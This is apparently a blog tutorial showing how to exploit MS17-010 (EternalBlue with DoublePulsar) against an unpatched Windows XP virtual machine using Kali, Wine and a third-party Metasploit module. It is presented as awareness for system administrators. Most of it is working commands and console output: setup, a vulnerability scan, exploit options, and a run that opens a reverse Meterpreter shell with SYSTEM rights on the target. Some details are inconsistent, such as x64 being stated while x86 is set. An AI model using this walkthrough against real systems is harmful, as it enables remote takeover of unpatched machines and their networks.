I’m resuming again with an article on how to put into practice a exploit that has killed so many victims. I’m doing it simply for increasing the sensitivity of system administrators to the importance of upgrading their systems.
Thinking that if the system is not reachable from outside is not necessary to update it is absolutely false. Infact attacking a PC surfing the internet and transforming it into a trojan horse to compromise internal systems is now a well-established practice (see my article about the pivot attack). The effects are very heavy: think to the infame WannaCry malware that has just used the MS17-010 vulnerability for attacking all the system vulnerables found scanning the surrounding network.
For these reasons I will focus about how to exploit the MS17-010 for compromising a Windows XP with Service Pack 2 not pached using kali and metasploit.
A bit of history for better understanding.
Earlier this year the ShadowBrokers has published a lot of stuff stolen from the NSA Arsenal (git repository https://github.com/misterch0c/shadowbroker) containing tools and exploit for Windows. One of these esploit called Eternalblue, fixed by the MS17-10 Windows bulletin, permits to take a remote control of any windows system not patched by FUZZBUNCH and Doublepulsar NSA tools (windows tools).
Eternalblue is the exploit used in this laboratory for compromising a windows xp system. The windows tools will be running in kali by a window emulator, called wine. The execution of windows tools will be transparent thanks to exploit code for metasploit released by elevenpaths.
This is the laboratory created in my Virtual Box for simulating the attack:
Before starting with the attack, I will describe all the steps necessary for preparing Kali and Metasploit.
Kali and Metasploit environment configuration
The FUZZBUNCH and Doublepulsar NSA tools use 32 bit windows libraries that needed for running on Kali the enabling of multiarch. This is done with these commands:
[root@kali contentstore]# dpkg –add-architecture i386 && apt-get update && apt-get install wine32
With win32, it’s now possible to run the framework
FUZZBUNCH coded in Python 2.6 with the need of PyWin32 v2.12.
The next step is to clone the git project created by Elevenpath for having the ruby exploit code with all the window binaries and dll of Fuzzbunch and Doublepulsar.
[root@kali contentstore]# cd /root
[root@kali root]# git clone https://github.com/ElevenPaths/
The next step is to move the ruby metasploit code in the right directory of metasploit framework:
[root@kali contentstore]# cp /root/Eternalblue-Doublepulsar-Metasploit/eternalblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/
Fuzzbunch is a exploit tool like metasploit framework. It exploits the smb vulnerability described in MS17-010 and it creates a backdoor smb pipe used by Doublepulsar for dll injection.
Let’s take a look at eternalblue_doublepulsar.rb and you can see that Doublepulsar is run after Fuzzbunch exploited with success.
[root@kali root]#/Eternalblue-Doublepulsar-Metasploit# more eternalblue_doublepulsar.rb |grep wine
OptString.new(‘WINEPATH’,[true,’WINE drive_c path’,’/root/.wine/drive_c/’]),
output = `cd #{datastore[‘ETERNALBLUEPATH’]}; wine Eternalblue-2.2.0.exe`
output2 = `cd #{datastore[‘DOUBLEPULSARPATH’]}; wine Doublepulsar-1.3.1.exe
Kali environment is ready for the attack. Let’s see it next.
Eternalblue_Doublepulsar Exploit
The first step is run msfconsole and verify if the remote system is vulnerable to MS17-10.
[root@kali root]#msfconsole
msf > use auxiliary/scanner/smb/smb_ms17_010
msf auxiliary(smb_ms17_010) > set RHOSTS 192.168.1.4
RHOSTS => 192.168.1.4
msf auxiliary(smb_ms17_010) > run
[+] 192.168.1.4:445 – Host is likely VULNERABLE to MS17-010! (Windows 5.1)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
The victim is vulnerable and then it’s possible to configure the eternalblue_doublepulsar exploit.
msf > search eternalblue
Matching Modules
================
Name Disclosure Date Rank Description
—- ————— —- ———–
auxiliary/scanner/smb/smb_ms17_010 normal MS17-010 SMB RCE Detection
exploit/windows/smb/eternalblue_doublepulsar normal EternalBlue
exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
msf > use exploit/windows/smb/eternalblue_doublepulsar
msf exploit(eternalblue_doublepulsar) > show options
Module options (exploit/windows/smb/eternalblue_doublepulsar):Name Current Setting Required Description
—- ————— ——– ———–
DOUBLEPULSARPATH /root/Eternalblue-Doublepulsar-Metasploit/deps/ yes Path directory of Doublepulsar
ETERNALBLUEPATH /root/Eternalblue-Doublepulsar-Metasploit/deps/ yes Path directory of Eternalblue
PROCESSINJECT wlms.exe yes Name of process to inject into (Change to lsass.exe for x64)
RHOST yes The target address
RPORT 445 yes The SMB service port (TCP)
TARGETARCHITECTURE x86 yes Target Architecture (Accepted: x86, x64)
WINEPATH /root/.wine/drive_c/ yes WINE drive_c path
Exploit target:
Id Name
— —-
8 Windows 7 (all services pack) (x86) (x64)
msf exploit(eternalblue_doublepulsar) >
Let me explain the meaning of most important parameters:
- TARGETARCHITECTURE: this is the architecture of the victim. In my case it’s 64 bit. I will set this to x64.
- PROCESSINJECT: This is the process where the dll generated by DoublePulsar will be attached. I will set it to explorer.exe.
- RHOST: this is the victim ip address.
- target: this is the target SO. In my case windows xp.
This exploit will create in automatically a TCP handler in listening, and in the injected DLL there is coded a reverse meterpreter session to kali system. For better understanding how a meterpreter session works read this article https://blog.rapid7.com/2015/03/25/stageless-meterpreter-payloads/.
Following how to configure the exploit:
msf > use exploit/windows/smb/eternalblue_doublepulsar
msf exploit(eternalblue_doublepulsar) > set RHOST 192.168.1.4
RHOST => 192.168.1.4
msf exploit(eternalblue_doublepulsar) > set PROCESSINJECT explorer.exe
PROCESSINJECT => explorer.exe
msf exploit(eternalblue_doublepulsar) > set TARGET x86
TARGET => x86
msf exploit(eternalblue_doublepulsar) > set target XP
target => XP
msf exploit(eternalblue_doublepulsar) > show options
Module options (exploit/windows/smb/eternalblue_doublepulsar):
Name Current Setting Required Description
—- ————— ——– ———–
DOUBLEPULSARPATH /root/Eternalblue-Doublepulsar-Metasploit/deps/ yes Path directory of Doublepulsar
ETERNALBLUEPATH /root/Eternalblue-Doublepulsar-Metasploit/deps/ yes Path directory of Eternalblue
PROCESSINJECT explorer.exe yes Name of process to inject into (Change to lsass.exe for x64)
RHOST 192.168.1.4 yes The target address
RPORT 445 yes The SMB service port (TCP)
TARGETARCHITECTURE x86 yes Target Architecture (Accepted: x86, x64)
WINEPATH /root/.wine/drive_c/ yes WINE drive_c path
Exploit target:
Id Name
— —-
0 Windows XP (all services pack) (x86) (x64)
msf exploit(eternalblue_doublepulsar) >
Let’s run now the exploit:
msf exploit(eternalblue_doublepulsar) > exploit
[*] Started reverse TCP handler on 192.168.1.3:4444
[*] 192.168.1.4:445 – Generating Eternalblue XML data
[*] 192.168.1.4:445 – Generating Doublepulsar XML data
[*] 192.168.1.4:445 – Generating payload DLL for Doublepulsar
[*] 192.168.1.4:445 – Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] 192.168.1.4:445 – Launching Eternalblue…
[+] 192.168.1.4:445 – Backdoor is already installed
[*] 192.168.1.4:445 – Launching Doublepulsar…
[*] Sending stage (179267 bytes) to 192.168.1.4
[*] Meterpreter session 2 opened (192.168.1.3:4444 -> 192.168.1.4:1460) at 2017-10-22 01:11:34 +0200
[+] 192.168.1.4:445 – Remote code executed… 3… 2… 1…
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Well Done. The attack was simply performed
Conclusions
I repeat that my goal was to demonstrate to system administrators how is simple to exploit a system not patched.
It’s better to be aware about the risks to witch we meet if we don’t patch the systems and this is the spirit of this article. Share knowledge to be safer.
Let me know for any issue or suggestions.